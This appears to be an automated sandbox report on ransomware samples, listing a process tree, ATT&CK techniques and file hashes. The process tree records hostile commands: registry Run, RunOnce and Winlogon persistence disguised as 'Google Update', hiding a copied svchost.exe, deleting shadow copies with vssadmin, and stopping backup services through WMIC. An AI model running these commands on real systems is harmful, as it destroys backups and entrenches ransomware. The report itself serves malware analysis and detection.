C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 14085⤵
- Program crash
PID:7260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 16365⤵
- Program crash
PID:5940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 18565⤵
- Program crash
PID:5600
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 16365⤵
- Program crash
PID:8008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 18645⤵
- Program crash
PID:8128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 17165⤵PID:3076
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 16765⤵PID:4564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 12965⤵PID:5128
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 18804⤵
- Program crash
PID:5840
-
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exeTrojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4324 -
C:\Windows\SysWOW64\cmd.exe/c mkdir C:\tmp4⤵
- System Location Discovery: System Language Discovery
PID:1400
-
-
C:\Windows\SysWOW64\cmd.exe/c copy svchost.exe C:\tmp4⤵
- System Location Discovery: System Language Discovery
PID:292
-
-
C:\Windows\SysWOW64\cmd.exe/c attrib +s +h "C:\tmp"4⤵
- System Location Discovery: System Language Discovery
PID:5840 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\tmp"5⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5864
-
-
-
C:\Windows\SysWOW64\cmd.exe/c copy svchost.exe %AppData%\Microsoft\Windows\Start Menu\Programs\Startup4⤵
- System Location Discovery: System Language Discovery
PID:5204
-
-
C:\Windows\SysWOW64\cmd.exe/c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3616 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5144
-
-
-
C:\Windows\SysWOW64\cmd.exe/c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1264 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5248
-
-
-
C:\Windows\SysWOW64\cmd.exe/c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5272 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5308
-
-
-
C:\Windows\SysWOW64\cmd.exe/c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5608 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"5⤵
- System Location Discovery: System Language Discovery
PID:6940
-
-
-
C:\Windows\SysWOW64\cmd.exe/c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5264
-
-
C:\Windows\SysWOW64\cmd.exe/c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"4⤵
- System Location Discovery: System Language Discovery
PID:9072
-
-
C:\Windows\SysWOW64\cmd.exe/c start vssadmin delete shadows /all /quiet4⤵
- System Location Discovery: System Language Discovery
PID:6268
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE "caption LIKE '%Cobian%'" CALL STOPSERVICE4⤵
- System Location Discovery: System Language Discovery
PID:11236
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE "caption LIKE '%Acronis%'" CALL STOPSERVICE4⤵
- System Location Discovery: System Language Discovery
PID:7676
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE "caption LIKE '%Veeam%'" CALL STOPSERVICE4⤵
- System Location Discovery: System Language Discovery
PID:724
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL STOPSERVICE4⤵
- System Location Discovery: System Language Discovery
PID:6680
-
-
-
C:\Users\Admin\Desktop\00378\VHO-Trojan-Ransom.Win32.GandCrypt.gen-58803c76d2fe76fd10c75d7c8393a5b002f00c6d14f14b9a748ac3efc1bc830c.exeVHO-Trojan-Ransom.Win32.GandCrypt.gen-58803c76d2fe76fd10c75d7c8393a5b002f00c6d14f14b9a748ac3efc1bc830c.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2768
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1408 -ip 14081⤵PID:4404
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv1⤵PID:4556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4412 -ip 44121⤵PID:4072
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4412 -ip 44121⤵PID:4060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4412 -ip 44121⤵PID:1948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5072 -ip 50721⤵PID:3664
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4412 -ip 44121⤵PID:3608
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:628
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4412 -ip 44121⤵PID:1972
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4412 -ip 44121⤵PID:1488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1396 -ip 13961⤵PID:212
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4412 -ip 44121⤵PID:4784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4412 -ip 44121⤵PID:5776
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1396 -ip 13961⤵PID:5276
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4412 -ip 44121⤵PID:5876
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1396 -ip 13961⤵PID:6136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4412 -ip 44121⤵PID:5992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1396 -ip 13961⤵PID:6048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4412 -ip 44121⤵PID:1816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1396 -ip 13961⤵PID:5080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4412 -ip 44121⤵PID:5184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1396 -ip 13961⤵PID:4384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4412 -ip 44121⤵PID:964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1396 -ip 13961⤵PID:5532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2864 -ip 28641⤵PID:5400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4412 -ip 44121⤵PID:4360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1396 -ip 13961⤵PID:7484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4412 -ip 44121⤵PID:5524
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\7w7o05f1-readme.txt1⤵PID:6944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1396 -ip 13961⤵PID:6384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4412 -ip 44121⤵PID:5128
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:5216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4412 -ip 44121⤵PID:9004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1396 -ip 13961⤵PID:9336
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4412 -ip 44121⤵PID:10828
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1396 -ip 13961⤵PID:9460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1396 -ip 13961⤵PID:10356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4412 -ip 44121⤵PID:9500
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:8020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1396 -ip 13961⤵PID:10668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4412 -ip 44121⤵PID:8052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1396 -ip 13961⤵PID:8708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4412 -ip 44121⤵PID:8824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1396 -ip 13961⤵PID:8076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4412 -ip 44121⤵PID:2540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4412 -ip 44121⤵PID:7308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1396 -ip 13961⤵PID:10824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 9200 -ip 92001⤵PID:7448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4412 -ip 44121⤵PID:11056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 9200 -ip 92001⤵PID:10924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4412 -ip 44121⤵PID:9936
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\FILES ENCRYPTED.txt1⤵PID:8456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 9200 -ip 92001⤵PID:6548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 4412 -ip 44121⤵PID:7604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 9200 -ip 92001⤵PID:5232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4412 -ip 44121⤵PID:9808
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 9200 -ip 92001⤵PID:7368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4412 -ip 44121⤵PID:7880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 9200 -ip 92001⤵PID:6612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4412 -ip 44121⤵PID:8028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 9200 -ip 92001⤵PID:9988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4412 -ip 44121⤵PID:7616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 9200 -ip 92001⤵PID:8752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4412 -ip 44121⤵PID:9172
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\42a69a33a8884e5ba045787d096274e3 /t 6820 /p 66681⤵PID:8604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 9200 -ip 92001⤵PID:7596
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4412 -ip 44121⤵PID:9356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 9200 -ip 92001⤵PID:9752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4412 -ip 44121⤵PID:9916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 9200 -ip 92001⤵PID:9208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4412 -ip 44121⤵PID:6180
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 9200 -ip 92001⤵PID:7728
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4412 -ip 44121⤵PID:7916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4412 -ip 44121⤵PID:8580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 9200 -ip 92001⤵PID:6884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4412 -ip 44121⤵PID:4636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 9200 -ip 92001⤵PID:3700
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\860033a6ced64ed4af6a0ae066dd15a2 /t 1960 /p 26241⤵PID:6396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4412 -ip 44121⤵PID:4868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4412 -ip 44121⤵PID:11244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4412 -ip 44121⤵PID:5400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 4412 -ip 44121⤵PID:3116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4412 -ip 44121⤵PID:10792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4412 -ip 44121⤵PID:7712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4412 -ip 44121⤵PID:10644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4412 -ip 44121⤵PID:8216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 4412 -ip 44121⤵PID:6712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4412 -ip 44121⤵PID:10416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4412 -ip 44121⤵PID:8896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4412 -ip 44121⤵PID:9340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4412 -ip 44121⤵PID:4524
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\mk1ah-readme.txt1⤵PID:9496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4412 -ip 44121⤵PID:8520
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 4412 -ip 44121⤵PID:10076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4412 -ip 44121⤵PID:10048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4412 -ip 44121⤵PID:3548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4412 -ip 44121⤵PID:6308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4412 -ip 44121⤵PID:11004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4412 -ip 44121⤵PID:9196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4412 -ip 44121⤵PID:5852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4412 -ip 44121⤵PID:556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4412 -ip 44121⤵PID:7940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4412 -ip 44121⤵PID:11088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4412 -ip 44121⤵PID:4156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 4412 -ip 44121⤵PID:11148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4412 -ip 44121⤵PID:5460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4412 -ip 44121⤵PID:7476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4412 -ip 44121⤵PID:11036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4412 -ip 44121⤵PID:9248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4412 -ip 44121⤵PID:10868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4412 -ip 44121⤵PID:8088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 4412 -ip 44121⤵PID:11192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 4412 -ip 44121⤵PID:9700
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 4412 -ip 44121⤵PID:9656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 4412 -ip 44121⤵PID:2580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4412 -ip 44121⤵PID:6084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 4412 -ip 44121⤵PID:7220
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4412 -ip 44121⤵PID:10104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 4412 -ip 44121⤵PID:5332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 4412 -ip 44121⤵PID:8004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 4412 -ip 44121⤵PID:11076
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:9108
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:8520
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\FILES ENCRYPTED.txt1⤵PID:7820
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1File and Directory Permissions Modification
1Hide Artifacts
3Hidden Files and Directories
3Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
1Safe Mode Boot
1Indicator Removal
2File Deletion
2Modify Registry
8Virtualization/Sandbox Evasion
1Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
2Credentials In Files
1Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
905KB
MD5ada996f2bbd4290aae5aa2ae60cd19c3
SHA1a37f30138de2753e0315741b35736e1938b5c9c2
SHA256d0f45a80cf8a7487cd51fc0972c6dc63f6a8bff02435e089860a1816e2a0e6e2
SHA51241c6b8f0a6d3fcfea0a9d1a9f5a32e42af992c795fa3e4b9e169c31693e8efc5659e904abc0cacff1e2afd73ddfddaa442256c643b783f1bf095f7d748a85d28
-
C:\AutoRun.exe.exe.id-7E980581.[[email protected]].bot
Filesize2.5MB
MD577817de1f8eafc61966db2165333d1b9
SHA1956b8de5765553d1d2190a3b5178a6ce4125141a
SHA25627a7c2298db266b3a7afb845a3e27b13f02f2a3a3e04fe7d30b0ef1f4822eb2e
SHA5126f1ba023b57748ce799fa546d8b67d3a65405184ecd28fa86496a8385682c20e3858009f75cc24ed8a2f404b71f35e5ed3293d205462fe31b7abb5f978c4afd4
-
Filesize
120B
MD51ca7358a7974ce7e9b1ce1f8cc3b6e2c
SHA10acf03e9694be29bd271e580ebbe1ea7246e0f7c
SHA2567454d1c157c20556ea46b282618d7590974b9c5d8283b510da0b30139595555d
SHA512af2ffff02b1f8dec8d265a5502d510161e46aae25a61900f133b02a787f4fb261a2bede5ed48823152908a9b3353bd26661056eed84a65454a9b2b822ce41498
-
Filesize
120B
MD5f5d874063d536215f3356c68c7245831
SHA1354dfff5540cccb614ecd7b60ec6bab55103aa0b
SHA25643aecc0ccec189aba925ed8107c0eb382adf6a9a8e7a901935f3765892778489
SHA512d1b902b6bbee90d7ae0d59d1624fe481f5be7cb60c9a7cf43e0c5327ea2f77453f1731c599deefe55164a2e237eb21239e82380f007030ccba64c423f673e144
-
Filesize
120B
MD5f38306388fe519493f537c15eefaf36e
SHA191191dd83173c0d42ab9e77d061a8a677cc2e576
SHA256d51b0861e4e579e735490ecdf604a543c7853a6bfe149a691ea14f625c51f669
SHA512264fd504b095b6a8a84d07e252e609ab6201202cedc43acb31d18c77bcb67db9d503d54365305a22a5d0e2bdb42894eaa95324546d08e784592354c99322e2e3
-
Filesize
120B
MD54b244a9b44e61c973275f36ec7210f5e
SHA1a7350a0d94c6a8e83494647800d0faadd1a7c0b1
SHA256b622a11edeb132be3231e95b87ced14625ddf0679edfd23db603ea6db904eb0c
SHA512c3bc03c46cf860f953708cac9ef79cab2c8b93ba1a099935e48c57ea1930497a294131d8f8f115fbde839a142b066b68421a96e82dba8ad0fa1def9e3b74d318
-
Filesize
120B
MD583db0d8c73377d23a3dc437f8696aec0
SHA139a30e8f7aef209d4ee7381f612fd1531dd4a39a
SHA2564e0af05985f38fe4a826d8023e47fc8b2e629ba3d436f76e0f833660d55c2396
SHA512d33b3f310de30e4aa594cbcd977eef13b54cadcf2d6c3e00469dab5c06737e8bf1caaccf81f6e3042193bac616e527d1d0bf93829ba70d0d3fea85c3d05d9a49
-
Filesize
120B
MD5162e62fd301199ba6f50600bdd660a84
SHA18001594c8be1e1754e3c1449f6295e5fa1ef37f4
SHA2566910fea7fda7f48c00ddd41d58dceab9d993bb880872f18d0f01219fc614c517
SHA5123a61e85831163089abfc36781e4a4194966e832632851340be1323072838bc262f5ab9741f258ab53beb9455fd8b5a86c7b197ddd4c66b7556360d72f1f6e976
-
Filesize
120B
MD595984787958f38c6fa7b7f22ca6ce0cb
SHA128f7503c9a3a77882b4acb5ffc09f740f70f02c7
SHA256aea136b94d69adf304d2aac1e050c79581c3c84d21fca9cd2db9ef5dfb365891
